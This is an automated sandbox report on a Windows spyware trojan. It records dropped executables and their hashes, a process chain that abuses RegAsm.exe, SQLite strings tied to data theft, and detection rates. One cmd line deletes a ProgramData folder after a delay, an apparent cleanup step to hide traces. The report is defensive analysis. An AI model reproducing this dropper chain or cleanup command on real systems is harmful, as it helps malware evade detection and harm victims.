Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2260226A	14_2_2260226A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22609390	14_2_22609390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22609A20	14_2_22609A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225EAEBE	14_2_225EAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_22609F80	14_2_22609F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_225AD7C0	14_2_225AD7C0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\DBGIJEHIID.exe 2B8BCD9D7D072FEB114E0436DC10AA80FDA52CDD46A4948EA1AE984F74898375
Source: Joe Sandbox View	Dropped File: C:\ProgramData\EGDGCGCFHI.exe DE664956D799E59E1CCA0788D545922EE420E3AFDCF277442F148F52BC78DF89

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C54CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C5594D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CB10 appears 57 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041DBA0 appears 150 times

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2112144297.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.2107399987.0000000000A76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVQP.exe\ vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KECBKKEBKE.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66fa2b049020f_ldnf[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EGDGCGCFHI.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66fa2afc5abea_vasd[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DBGIJEHIID.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@46/62@22/9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C577030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6C577030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00411807

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
Source: C:\Users\userIJEGDBGDBF.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2665362322.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000003.00000002.2622122875.0000000020358000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3065991544.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	ReversingLabs: Detection: 50%
Source: file.exe	Virustotal: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KECBKKEBKE.exe "C:\ProgramData\KECBKKEBKE.exe"
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\EGDGCGCFHI.exe "C:\ProgramData\EGDGCGCFHI.exe"
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DBGIJEHIID.exe "C:\ProgramData\DBGIJEHIID.exe"
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FIJKEHJJDAAK" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userGIEGHJEGHJ.exe "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Users\userGIEGHJEGHJ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Users\userGIEGHJEGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIJEGDBGDBF.exe "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Users\userIJEGDBGDBF.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\userIJEGDBGDBF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\KECBKKEBKE.exe "C:\ProgramData\KECBKKEBKE.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\EGDGCGCFHI.exe "C:\ProgramData\EGDGCGCFHI.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\DBGIJEHIID.exe "C:\ProgramData\DBGIJEHIID.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FIJKEHJJDAAK" & exit	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userGIEGHJEGHJ.exe "C:\Users\userGIEGHJEGHJ.exe"
Source: C:\Users\userGIEGHJEGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\userIJEGDBGDBF.exe "C:\Users\userIJEGDBGDBF.exe"
Source: C:\Users\userIJEGDBGDBF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
